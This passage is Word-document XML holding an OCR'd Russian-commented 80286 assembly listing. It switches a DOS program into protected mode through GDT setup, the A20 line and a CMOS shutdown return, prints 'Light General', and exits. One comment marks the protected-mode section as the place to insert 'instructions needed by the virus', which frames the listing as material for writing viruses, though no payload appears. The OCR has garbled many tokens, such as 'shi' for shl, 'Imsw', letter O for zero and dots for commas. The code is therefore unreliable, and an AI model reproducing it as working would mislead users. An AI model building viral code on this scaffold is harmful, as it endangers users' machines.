      </w:pPr>
      <w:r>
        <w:t>ACC_PRESENT equ WOOOOOOb</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ACC_CSEG equ OOO-MOOOb</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ACC_DSEG equ 000-IOOOOb</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ACC_EXPDOWN equ 000001 OOb</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ACC_CONFORM equ 000001 OOb</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">ACC_DATAWR equ 0000001 Ob </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>DATA_ACC=ACC_PRESENT or ACC_DSEG or ACC_DATAWR</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">; 1001001 Ob </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>CODE_ACC=ACC_PRESENT or ACC.CSEG or ACC_CONFORM</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">; 10011100b </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>STACK_ACC=ACC_PRESENT or ACC_DSEG or ACC_DATAWR or</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">ACC.EXPDOWN; 1001011 Ob </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Размеры сегментов (реальные размеры на единицу больше)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">CSEG SIZE=65535 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>DSEG_SIZE=65535</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">STACK_SIZE=65535 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Смещения используемых дескрипторов</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>CS_DESCR=(gdt_cs-gdt_0)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>DS_DESCR=(gdt_ds-gdt_0)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">SS_DESCR=(gdt_ss-gdt_0) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Константы значений портов ?</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>CMOS_PORT equ 70h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>STATUS_PORT equ 64h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>SHUTDOWN equ OFEh</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>A20_PORT equ OD1h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>A20_ON equ ODFh</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>A20_OFF equ ODDh</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>INT_MASK_PORT equ 21 h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>KBD_PORT_A equ 60h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">start: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Инициализируем необходимые данные для перехода</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;в защищенный режим </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">call init_protected_mode </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>[Переходим в защищенный режим</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">call set_protected_mode </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Теперь компьютер работает в защищенном режиме!</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;Так как таблица прерываний реального режима не может быть </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>использована в защищенном, прерывания запрещены!</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;Именно тут можно вставить инструкции, нужные вирусу</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>.Возвращаемся в реальный режим</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">call set_real_mode </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Печатаем сообщение "Light General"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov ah,09h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>lea dx.qw</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">int 21 h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Выходим в DOS</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov ax,4COOh</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">int 21 h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Макрокоманда для установки адреса для дескриптора</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;в глобальной таблице дескрипторов GDT.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;На входе регистры DLAX должны содержать</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>.абсолютный адрес сегмента</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">setgdtentry MACRO </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov [desc_struc.base_l][bx],ax </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>mov [desc_struc.base_h][bx],dl</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">ENDM </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•&lt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>; Процедура инициализации необходимых данных</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>.для перехода в защищенный режим</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">init_protected_mode PROC </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>вычисляем абсолютный адрес для сегмента данных</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;в соответствии со значением регистра DS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov ax.ds </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov dl.ah </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">shr dl,4 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">shi ax,4 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Устанавливаем адрес сегмента данных</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;в глобальной таблице дескрипторов </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov bx, offset gdt_ds </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">setgdtentry </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Вычисляем абсолютный адрес для сегмента GDT: прибавляем</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;к уже вычисленному абсолютному адресу сегмента данных</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;смещение в нем таблицы дескрипторов </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">add ax,offset gdtr </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">adc dl.0 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Останавливаем адрес сегмента GDT</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;в глобальной таблице дескрипторов </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov bx.offset gdt_gdt </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">setgdtentry </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Вычисляем абсолютный адрес для сегмента кода</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;в соответствии со значением регистра CS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov ax,cs </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov dl.ah </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">shr dl,4 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">shi ax,4 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Устанавливаем адрес сегмента кода</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;в глобальной таблице дескрипторов </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov bx, offset gdt_cs </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">setgdtentry </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Вычисляем абсолютный адрес для сегмента стека</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;в соответствии со значением регистра SS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov ax.ss </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov dl.ah </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">shr dl,4 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">shi ax,4 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Останавливаем адрес сегмента стека</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;в глобальной таблице дескрипторов </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov bx,offset gdt_ss </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">setgdtentry </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Перехватываем рестарт. Так как процессор i286 (а эта программа</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>[рассчитана именно на такой процессор) не имеет возможности</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;возврата в реальный режим из защищенного, возврат в реальный</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>режим будем производить следующим образом: перехватим рестарт,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>.сгенерируем CPU Reset, после которого получим управление, когда</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Процессор будет находится уже в реальном режиме. На процессоре</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;i386 возврат в реальный режим происходит</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">[значительно проще и "естественнее". </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">push ds </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov ax,40h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov ds,ax </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov word ptr ds:[0067h], offset shutdown_return </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov word ptr ds:[0069h],cs </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pop ds </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Запрещаем маскируемые прерывания</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">cli </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>in al,INT_MASK_PORT</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>or al.OFFh</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">out INT_MASK_PORT,al </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Запрещаем немаскируемые прерывания. Данная последовательность</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;команд не запрещает "незапрещаемые" прерывания в процессоре</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">[(этого сделать по определению нельзя), а "не пускает" сигнал </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[немаскируемого прерывания к процессору </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov al,8Fh </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">out CMOS_PORT,al </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">jmp $+2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov al,5 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">out CMOS_PORT+1,al </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">init_protected_mode ENDP </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Подпрограмма, переводящая процессор в защищенный режим</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">set_protected_mode PROC </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Открываем адресную линию А20 для доступа свыше 1Мбайт.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;При закрытой линии адресное пространство</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>["зацикливается" в пределах 1Мбайт</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">call enable_a20 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Сохраняем значение регистра SS для реального режима</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">mov real_ss,ss </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Переводим компилятор Turbo Assembler в улучшенный режим.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>[IDEAL - это не команда и не оператор, это директива, влияющая</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">[только на интерпретацию дальнейших строк листинга </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ideal </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">р286 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Загружаем регистр глобальной таблицы дескрипторов GDTR</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Igdt [QWORD gdt_gdt] ;db OFh,01h,16h dw offset gdt_gdt </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Переводим процессор в защищенный режим</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov ax,0001h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Imsw ax ;db OFh,01h,FOh </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Переводим компилятор Turbo Assembler назад в режим MASM</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>masm</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">.286 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Производим длинный переход для того,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>.чтобы очистить внутреннюю очередь</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">.команд процессора </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">jmp far flush </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">db OEAh </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">dw offset flush </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>dw CS_DESCR</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">flush: </w:t>
      </w:r>
    </w:p>
